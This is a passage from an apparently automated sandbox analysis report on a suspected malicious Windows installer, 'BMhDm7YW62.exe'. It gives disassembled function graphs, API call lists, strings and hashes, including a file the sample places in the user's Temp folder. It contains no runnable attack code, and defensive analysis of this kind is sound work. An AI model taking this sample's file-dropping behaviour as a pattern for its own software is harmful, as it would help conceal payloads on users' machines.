                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                        • String ID: "C:\Users\user\Desktop\BMhDm7YW62.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsfB756.tmp\*.*$\*.*
                                                                                                                        • API String ID: 2035342205-148605580
                                                                                                                        • Opcode ID: 6e39d08db0da8798d4da0934d55880c8f60954caf57b81e1320f45a4632593a2
                                                                                                                        • Instruction ID: 6fea787f5ff7f663b03802bfccf250d7b0f6b6b9ddff8139893414afbc0e0c0d
                                                                                                                        • Opcode Fuzzy Hash: 6e39d08db0da8798d4da0934d55880c8f60954caf57b81e1320f45a4632593a2
                                                                                                                        • Instruction Fuzzy Hash: D851CE30804A447ACB216B218C49BBF3B78DF92728F54857BF809751D2E73D5982DE5E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004061D4 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 593 4061d4-4061d9 594 40624a-406268 593->594 595 4061db-40620a 593->595 598 406840-406855 594->598 596 406211-406215 595->596 597 40620c-40620f 595->597 602 406217-40621b 596->602 603 40621d 596->603 601 406221-406224 597->601 599 406857-40686d 598->599 600 40686f-406885 598->600 604 406888-40688f 599->604 600->604 605 406242-406245 601->605 606 406226-40622f 601->606 602->601 603->601 607 406891-406895 604->607 608 4068b6-4068c2 604->608 611 406417-406435 605->611 609 406231 606->609 610 406234-406240 606->610 612 406a44-406a4e 607->612 613 40689b-4068b3 607->613 622 406058-406061 608->622 609->610 617 4062aa-4062d8 610->617 614 406437-40644b 611->614 615 40644d-40645f 611->615 618 406a5a-406a6d 612->618 613->608 621 406462-40646c 614->621 615->621 619 4062f4-40630e 617->619 620 4062da-4062f2 617->620 623 406a72-406a76 618->623 624 406311-40631b 619->624 620->624 627 40646e 621->627 628 40640f-406415 621->628 625 406067 622->625 626 406a6f 622->626 630 406321 624->630 631 406292-406298 624->631 632 406113-406117 625->632 633 406183-406187 625->633 634 40606e-406072 625->634 635 4061ae-4061cf 625->635 626->623 636 4063ea-4063ee 627->636 637 40657f-40658c 627->637 628->611 629 4063b3-4063bd 628->629 638 406a02-406a0c 629->638 639 4063c3-4063e5 629->639 655 406277-40628f 630->655 656 4069de-4069e8 630->656 640 40634b-406351 631->640 641 40629e-4062a4 631->641 644 4069c3-4069cd 632->644 645 40611d-406136 632->645 648 4069d2-4069dc 633->648 649 40618d-4061a1 633->649 634->618 647 406078-406085 634->647 635->598 642 4063f4-40640c 636->642 643 4069f6-406a00 636->643 637->622 638->618 639->637 650 4063af 640->650 652 406353-406371 640->652 641->617 641->650 642->628 643->618 644->618 651 406139-40613d 645->651 647->626 653 40608b-4060d1 647->653 648->618 654 4061a4-4061ac 649->654 650->629 651->632 657 40613f-406145 651->657 658 406373-406387 652->658 659 406389-40639b 652->659 660 4060d3-4060d7 653->660 661 4060f9-4060fb 653->661 654->633 654->635 655->631 656->618 664 406147-40614e 657->664 665 40616f-406181 657->665 666 40639e-4063a8 658->666 659->666 667 4060e2-4060f0 GlobalAlloc 660->667 668 4060d9-4060dc GlobalFree 660->668 662 406109-406111 661->662 663 4060fd-406107 661->663 662->651 663->662 663->663 669 406150-406153 GlobalFree 664->669 670 406159-406169 GlobalAlloc 664->670 665->654 666->640 671 4063aa 666->671 667->626 672 4060f6 667->672 668->667 669->670 670->626 670->665 674 406330-406348 671->674 675 4069ea-4069f4 671->675 672->661 674->640 675->618
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                                                                                                        • Instruction ID: bc715f9ab80968e75e2fbed037c5f1c5951903de2449374fee89636cff417fa3
                                                                                                                        • Opcode Fuzzy Hash: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                                                                                                        • Instruction Fuzzy Hash: 52F18571D00229CBCF28DFA8C8946ADBBB1FF45305F25816ED856BB281D3785A96CF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405E93 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 738 405e93-405ea7 FindFirstFileA 739 405eb4 738->739 740 405ea9-405eb2 FindClose 738->740 741 405eb6-405eb7 739->741 740->741
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNELBASE(?,00422588,C:\,004057AF,C:\,C:\,00000000,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405E9E
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00405EAA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID: C:\
                                                                                                                        • API String ID: 2295610775-3404278061
                                                                                                                        • Opcode ID: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                                                                                                        • Instruction ID: 22d16aeb20e1d117df59da4f29a20059377f8c00669f4036672bdba2b414caf9
                                                                                                                        • Opcode Fuzzy Hash: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                                                                                                        • Instruction Fuzzy Hash: 95D0123190D520ABD7015738BD0C84B7A59DB553323508F32B465F53E0C7788D928AEA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403981 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 132 403981-403993 133 403ad4-403ae3 132->133 134 403999-40399f 132->134 135 403b32-403b47 133->135 136 403ae5-403b2d GetDlgItem * 2 call 403e54 SetClassLongA call 40140b 133->136 134->133 137 4039a5-4039ae 134->137 139 403b87-403b8c call 403ea0 135->139 140 403b49-403b4c 135->140 136->135 141 4039b0-4039bd SetWindowPos 137->141 142 4039c3-4039c6 137->142 154 403b91-403bac 139->154 146 403b4e-403b59 call 401389 140->146 147 403b7f-403b81 140->147 141->142 143 4039e0-4039e6 142->143 144 4039c8-4039da ShowWindow 142->144 149 403a02-403a05 143->149 150 4039e8-4039fd DestroyWindow 143->150 144->143 146->147 168 403b5b-403b7a SendMessageA 146->168 147->139 153 403e21 147->153 158 403a07-403a13 SetWindowLongA 149->158 159 403a18-403a1e 149->159 156 403dfe-403e04 150->156 155 403e23-403e2a 153->155 161 403bb5-403bbb 154->161 162 403bae-403bb0 call 40140b 154->162 156->153 169 403e06-403e0c 156->169 158->155 166 403ac1-403acf call 403ebb 159->166 167 403a24-403a35 GetDlgItem 159->167 164 403bc1-403bcc 161->164 165 403ddf-403df8 DestroyWindow EndDialog 161->165 162->161 164->165 171 403bd2-403c1f call 405bba call 403e54 * 3 GetDlgItem 164->171 165->156 166->155 172 403a54-403a57 167->172 173 403a37-403a4e SendMessageA IsWindowEnabled 167->173 168->155 169->153 170 403e0e-403e17 ShowWindow 169->170 170->153 202 403c21-403c26 171->202 203 403c29-403c65 ShowWindow EnableWindow call 403e76 EnableWindow 171->203 176 403a59-403a5a 172->176 177 403a5c-403a5f 172->177 173->153 173->172 180 403a8a-403a8f call 403e2d 176->180 181 403a61-403a67 177->181 182 403a6d-403a72 177->182 180->166 185 403aa8-403abb SendMessageA 181->185 186 403a69-403a6b 181->186 182->185 187 403a74-403a7a 182->187 185->166 186->180 188 403a91-403a9a call 40140b 187->188 189 403a7c-403a82 call 40140b 187->189 188->166 199 403a9c-403aa6 188->199 198 403a88 189->198 198->180 199->198 202->203 206 403c67-403c68 203->206 207 403c6a 203->207 208 403c6c-403c9a GetSystemMenu EnableMenuItem SendMessageA 206->208 207->208 209 403c9c-403cad SendMessageA 208->209 210 403caf 208->210 211 403cb5-403cee call 403e89 call 405b98 lstrlenA call 405bba SetWindowTextA call 401389 209->211 210->211 211->154 220 403cf4-403cf6 211->220 220->154 221 403cfc-403d00 220->221 222 403d02-403d08 221->222 223 403d1f-403d33 DestroyWindow 221->223 222->153 224 403d0e-403d14 222->224 223->156 225 403d39-403d66 CreateDialogParamA 223->225 224->154 226 403d1a 224->226 225->156 227 403d6c-403dc3 call 403e54 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 225->227 226->153 227->153 232 403dc5-403ddd ShowWindow call 403ea0 227->232 232->156
                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039BD
                                                                                                                        • ShowWindow.USER32(?), ref: 004039DA
                                                                                                                        • DestroyWindow.USER32 ref: 004039EE
                                                                                                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A0A
                                                                                                                        • GetDlgItem.USER32(?,?), ref: 00403A2B
                                                                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A3F
                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403A46
                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00403AF4
                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403AFE
                                                                                                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403B18
                                                                                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B69
                                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00403C0F
                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00403C30
                                                                                                                        • EnableWindow.USER32(?,?), ref: 00403C42
                                                                                                                        • EnableWindow.USER32(?,?), ref: 00403C5D
                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C73
                                                                                                                        • EnableMenuItem.USER32(00000000), ref: 00403C7A
                                                                                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C92
                                                                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CA5
                                                                                                                        • lstrlenA.KERNEL32(00420538,?,00420538,jtlkrtaftpgmppuxhth Setup), ref: 00403CCE
                                                                                                                        • SetWindowTextA.USER32(?,00420538), ref: 00403CDD
                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00403E11
                                                                                                                        Strings
                                                                                                                        • jtlkrtaftpgmppuxhth Setup, xrefs: 00403CBF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                        • String ID: jtlkrtaftpgmppuxhth Setup
                                                                                                                        • API String ID: 184305955-3240427284
                                                                                                                        • Opcode ID: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                                                                                                        • Instruction ID: 5fd13e9e65c650ae90d185cc2d11acb2e8fe01e0af56b63b73109b0399f4b85d
                                                                                                                        • Opcode Fuzzy Hash: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                                                                                                        • Instruction Fuzzy Hash: EFC1CF71A04201BBDB20AF61ED85D2B7EBCEB4470AB40453EF541B51E1C73DAA429F5E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004035EB Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 235 4035eb-403603 call 405f28 238 403605-403615 call 405af6 235->238 239 403617-40363e call 405a7f 235->239 248 403661-40368a call 4038b4 call 40576c 238->248 244 403640-403651 call 405a7f 239->244 245 403656-40365c lstrcatA 239->245 244->245 245->248 253 403690-403695 248->253 254 403711-403719 call 40576c 248->254 253->254 255 403697-4036bb call 405a7f 253->255 260 403727-40374c LoadImageA 254->260 261 40371b-403722 call 405bba 254->261 255->254 262 4036bd-4036bf 255->262 264 403752-403788 RegisterClassA 260->264 265 4037db-4037e3 call 40140b 260->265 261->260 266 4036d0-4036dc lstrlenA 262->266 267 4036c1-4036ce call 4056b6 262->267 268 4038aa 264->268 269 40378e-4037d6 SystemParametersInfoA CreateWindowExA 264->269 279 4037e5-4037e8 265->279 280 4037ed-4037f8 call 4038b4 265->280 273 403704-40370c call 40568b call 405b98 266->273 274 4036de-4036ec lstrcmpiA 266->274 267->266 272 4038ac-4038b3 268->272 269->265 273->254 274->273 278 4036ee-4036f8 GetFileAttributesA 274->278 283 4036fa-4036fc 278->283 284 4036fe-4036ff call 4056d2 278->284 279->272 288 403881-403889 call 404f56 280->288 289 4037fe-403818 ShowWindow call 405eba 280->289 283->273 283->284 284->273 294 4038a3-4038a5 call 40140b 288->294 295 40388b-403891 288->295 296 403824-403836 GetClassInfoA 289->296 297 40381a-40381f call 405eba 289->297 294->268 295->279 298 403897-40389e call 40140b 295->298 301 403838-403848 GetClassInfoA RegisterClassA 296->301 302 40384e-403871 DialogBoxParamA call 40140b 296->302 297->296 298->279 301->302 306 403876-40387f call 40353b 302->306 306->272
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                                                                                          • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                                                                                        • lstrcatA.KERNEL32(1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\BMhDm7YW62.exe",00000000), ref: 0040365C
                                                                                                                        • lstrlenA.KERNEL32("C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,?,?,?,"C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 004036D1
                                                                                                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 004036E4
                                                                                                                        • GetFileAttributesA.KERNEL32("C:\Users\user\AppData\Local\Temp\okawzsv.exe" ), ref: 004036EF
                                                                                                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403738
                                                                                                                          • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                                                                                                        • RegisterClassA.USER32 ref: 0040377F
                                                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403797
                                                                                                                        • CreateWindowExA.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004037D0
                                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403806
                                                                                                                        • GetClassInfoA.USER32(00000000,RichEdit20A,004236E0), ref: 00403832
                                                                                                                        • GetClassInfoA.USER32(00000000,RichEdit,004236E0), ref: 0040383F
                                                                                                                        • RegisterClassA.USER32(004236E0), ref: 00403848
                                                                                                                        • DialogBoxParamA.USER32(?,00000000,00403981,00000000), ref: 00403867
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\okawzsv.exe" $"C:\Users\user\Desktop\BMhDm7YW62.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$6B
                                                                                                                        • API String ID: 1975747703-3278333868
                                                                                                                        • Opcode ID: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                                                                                                        • Instruction ID: 6624008b3449f808402c67b3262d240ca0850aee1e0dcbc9c28568ef27b6b269
                                                                                                                        • Opcode Fuzzy Hash: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                                                                                                        • Instruction Fuzzy Hash: 6A61E9B17002047EE620AF619D45E3B7ABCEB4474AF40457FF941B22E2D77D9E428A2D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402C55 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 309 402c55-402ca3 GetTickCount GetModuleFileNameA call 40586f 312 402ca5-402caa 309->312 313 402caf-402cdd call 405b98 call 4056d2 call 405b98 GetFileSize 309->313 314 402e87-402e8b 312->314 321 402ce3 313->321 322 402dca-402dd8 call 402bf1 313->322 323 402ce8-402cff 321->323 329 402dda-402ddd 322->329 330 402e2d-402e32 322->330 325 402d01 323->325 326 402d03-402d05 call 403081 323->326 325->326 333 402d0a-402d0c 326->333 331 402e01-402e2b GlobalAlloc call 4030b3 call 402e8e 329->331 332 402ddf-402df0 call 4030b3 call 403081 329->332 330->314 331->330 360 402e3e-402e4f 331->360 349 402df5-402df7 332->349 335 402d12-402d19 333->335 336 402e34-402e3c call 402bf1 333->336 339 402d95-402d99 335->339 340 402d1b-402d2f call 405830 335->340 336->330 344 402da3-402da9 339->344 345 402d9b-402da2 call 402bf1 339->345 340->344 358 402d31-402d38 340->358 351 402db8-402dc2 344->351 352 402dab-402db5 call 405f97 344->352 345->344 349->330 355 402df9-402dff 349->355 351->323 359 402dc8 351->359 352->351 355->330 355->331 358->344 364 402d3a-402d41 358->364 359->322 361 402e51 360->361 362 402e57-402e5c 360->362 361->362 365 402e5d-402e63 362->365 364->344 366 402d43-402d4a 364->366 365->365 367 402e65-402e80 SetFilePointer call 405830 365->367 366->344 368 402d4c-402d53 366->368 371 402e85 367->371 368->344 370 402d55-402d75 368->370 370->330 372 402d7b-402d7f 370->372 371->314 373 402d81-402d85 372->373 374 402d87-402d8f 372->374 373->359 373->374 374->344 375 402d91-402d93 374->375 375->344
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 00402C66
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\BMhDm7YW62.exe,00000400), ref: 00402C82
                                                                                                                          • Part of subcall function 0040586F: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\BMhDm7YW62.exe,80000000,00000003), ref: 00405873
                                                                                                                          • Part of subcall function 0040586F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\BMhDm7YW62.exe,C:\Users\user\Desktop\BMhDm7YW62.exe,80000000,00000003), ref: 00402CCE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                        • String ID: "C:\Users\user\Desktop\BMhDm7YW62.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\BMhDm7YW62.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$pA
                                                                                                                        • API String ID: 4283519449-1341131651
                                                                                                                        • Opcode ID: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                                                                                                        • Instruction ID: 62828f2e2b01cd2e9021f71d1007b468b6294b04ed91f3cf43b909f99e7c5814
                                                                                                                        • Opcode Fuzzy Hash: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                                                                                                        • Instruction Fuzzy Hash: C151E371E00214ABDB209F64DE89B9E7BB4EF04355F20403BF904B62D1C7BC9E458A9D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402E8E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166fileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 445 402e8e-402ea2 446 402ea4 445->446 447 402eab-402eb3 445->447 446->447 448 402eb5 447->448 449 402eba-402ebf 447->449 448->449 450 402ec1-402eca call 4030b3 449->450 451 402ecf-402edc call 403081 449->451 450->451 455 402ee2-402ee6 451->455 456 40302c 451->456 457 403015-403017 455->457 458 402eec-402f0c GetTickCount call 406005 455->458 459 40302e-40302f 456->459 460 403019-40301c 457->460 461 40306c-403070 457->461 469 403077 458->469 471 402f12-402f1a 458->471 463 40307a-40307e 459->463 466 403021-40302a call 403081 460->466 467 40301e 460->467 464 403031-403037 461->464 465 403072 461->465 472 403039 464->472 473 40303c-40304a call 403081 464->473 465->469 466->456 479 403074 466->479 467->466 469->463 476 402f1c 471->476 477 402f1f-402f2d call 403081 471->477 472->473 473->456 481 40304c-40305f WriteFile 473->481 476->477 477->456 483 402f33-402f3c 477->483 479->469 484 403011-403013 481->484 485 403061-403064 481->485 486 402f42-402f5f call 406025 483->486 484->459 485->484 487 403066-403069 485->487 490 402f65-402f7c GetTickCount 486->490 491 40300d-40300f 486->491 487->461 492 402fc1-402fc5 490->492 493 402f7e-402f86 490->493 491->459 496 403002-403005 492->496 497 402fc7-402fca 492->497 494 402f88-402f8c 493->494 495 402f8e-402fbe MulDiv wsprintfA call 404e84 493->495 494->492 494->495 495->492 496->471 498 40300b 496->498 500 402fea-402ff0 497->500 501 402fcc-402fde WriteFile 497->501 498->469 502 402ff6-402ffa 500->502 501->484 504 402fe0-402fe3 501->504 502->486 505 403000 502->505 504->484 506 402fe5-402fe8 504->506 505->469 506->502
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 00402EEC
                                                                                                                        • GetTickCount.KERNEL32 ref: 00402F6D
                                                                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F9A
                                                                                                                        • wsprintfA.USER32 ref: 00402FAA
                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,0040F0E0,00000000,00000000), ref: 00402FD6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
